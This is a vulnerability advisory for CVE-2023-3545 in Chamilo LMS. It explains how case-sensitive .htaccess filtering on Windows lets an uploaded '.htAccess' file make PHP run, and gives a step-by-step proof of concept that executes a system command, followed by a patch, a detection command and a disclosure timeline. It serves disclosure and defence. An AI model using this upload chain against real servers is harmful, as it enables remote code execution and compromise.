Summary
| Product | Chamilo |
|---|---|
| Vendor | Chamilo |
| Severity | High - Adversaries may exploit software vulnerabilities to obtain unauthenticated remote code execution. |
| Affected Versions | <= v1.11.20 |
| Tested Versions | v1.11.20 (latest version as of writing) |
| CVE Identifier | CVE-2023-3545 |
| CVE Description | Improper sanitisation in main/inc/lib/fileUpload.lib.php in Chamilo LMS <= v1.11.20 on Windows and Apache installations allows unauthenticated attackers to bypass file upload security protections and obtain remote code execution via uploading of .htaccess file. This vulnerability may be exploited by privileged attackers or chained with unauthenticated arbitrary file write vulnerabilities, such as CVE-2023-3533, to achieve remote code execution. |
| CWE Classification(s) | CWE-178: Improper Handling of Case Sensitivity |
| CAPEC Classification(s) | CAPEC-650: Upload a Web Shell to a Web Server |
CVSS3.1 Scoring System
Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:N/C:H/I:H/A:H
| Metric | Value |
|---|---|
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | None |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |
Product Overview
Chamilo is an open-source PHP-based Learning Management System (LMS) that facilitates online education and training. It offers features such as course creation, content management, assessments, collaboration and delivering educational resources.
Vulnerability Summary
The htaccess2txt() function in main/inc/lib/fileUpload.lib.php does not correctly prevent uploading of valid .htaccess files on Windows systems. Consequently, an unauthenticated attacker can chain this vulnerability with unauthenticated arbitrary file write vulnerabilities, CVE-2023-3533, to achieve remote code execution.
Vulnerability Details
The relevant vulnerable code in main/inc/lib/fileUpload.lib.php is shown below:
function htaccess2txt($filename)
{
return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
}
Observe that case-sensitive replacement of .htaccess and .HTACCESS is performed. By default, on Windows systems, filenames are case-insensitive. As such, any capitalised variants of .htaccess are treated as valid .htaccess files.
Some examples of valid .htaccess files:
.Htaccess.HTaccess.htAccess
Consequently, an authenticated attacker with Trainer role can exploit this vulnerability to obtain remote code execution.
A trainer can upload a valid .htaccess file to include an AddType directive to treat file extensions as PHP scripts:
AddType application/x-httpd-php .1337
Then, upload a PHP file named with the .1337 extension and visiting the http(s)://<chamilo>/app/courses/<course_id>/document/<filename> to execute the uploaded file as a PHP script.
However, the maximum impact is unauthenticated remote code execution on Windows with Apache installations, as this vulnerability may also be chained with CVE-2023-3533 (unauthenticated arbitrary file write).
Exploit Conditions
For remote code execution to be possible, the following conditions must be satisfied:
- The target must be running on Windows systems.
- The target must be using Apache web server (to allow
.htaccessprocessing).
An unauthenticated attacker may chain an unauthenticated arbitrary file write vulnerability, such as CVE-2023-3533, to achieve remote code execution. Alternatively, an authenticated attacker with Trainer role or above may exploit the vulnerability without chaining with other vulnerabilities.
Proof-of-Concept
The following proof-of-concept demonstrates how the vulnerability in this report can be exploited by an authenticated attacker with Trainer role.
- Log in to an account with Trainer role.
- Create a new course named
TESTCOURSE. - Navigate to
http://<chamilo>/main/document/upload.php?cidReq=TESTCOURSE. - Upload a file named
.htAccesswith the following file contents:AddType application/x-httpd-php .1337 - Upload a file named
rce.1337with the following file contents:<?php system("type C:\\Windows\\win.ini"); ?> - Navigate to
http://<chamilo>/app/courses/TESTCOURSE/document/rce.1337. Observe that the contents ofC:\Windows\win.iniis returned, indicating that the attacker has successfully achieved remote code execution:; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
Suggested Mitigations
Ensure that the renaming of .htaccess to htaccess.txt is done by replacing case-insensitively.
For example:
function htaccess2txt($filename)
{
- return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
+ return str_ireplace('.htaccess', 'htaccess.txt', $filename);
}
End users are encouraged to update to the latest version of Chamilo.
Detection Guidance
It is possible to detect the exploitation of this vulnerability by checking the web root and its subdirectories for suspicious .htaccess file (i.e. not .htaccess and not .HTACCESS):
For example, the following command can be used on UNIX-based systems:
$ find . \( -iname '.htaccess' -a -not -name '.htaccess' -a -not -name '.HTACCESS' \)
Credits
Ngo Wei Lin (@Creastery) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Timeline
- 2023-07-13 Vendor Disclosure
- 2023-07-14 Initial Vendor Contact
- 2023-07-18 Vendor published the vulnerability sumamry
- 2023-07-17 Mutual agreement to delay the publication of vulnerability details was reached in light of the recent in-the-wild exploitation of Chamilo N-day vulnerability (CVE-2023-34960)
- 2023-08-03 Vendor Patch Release (v1.11.22) completely fixing vulnerability
- 2023-11-28 Public Disclosure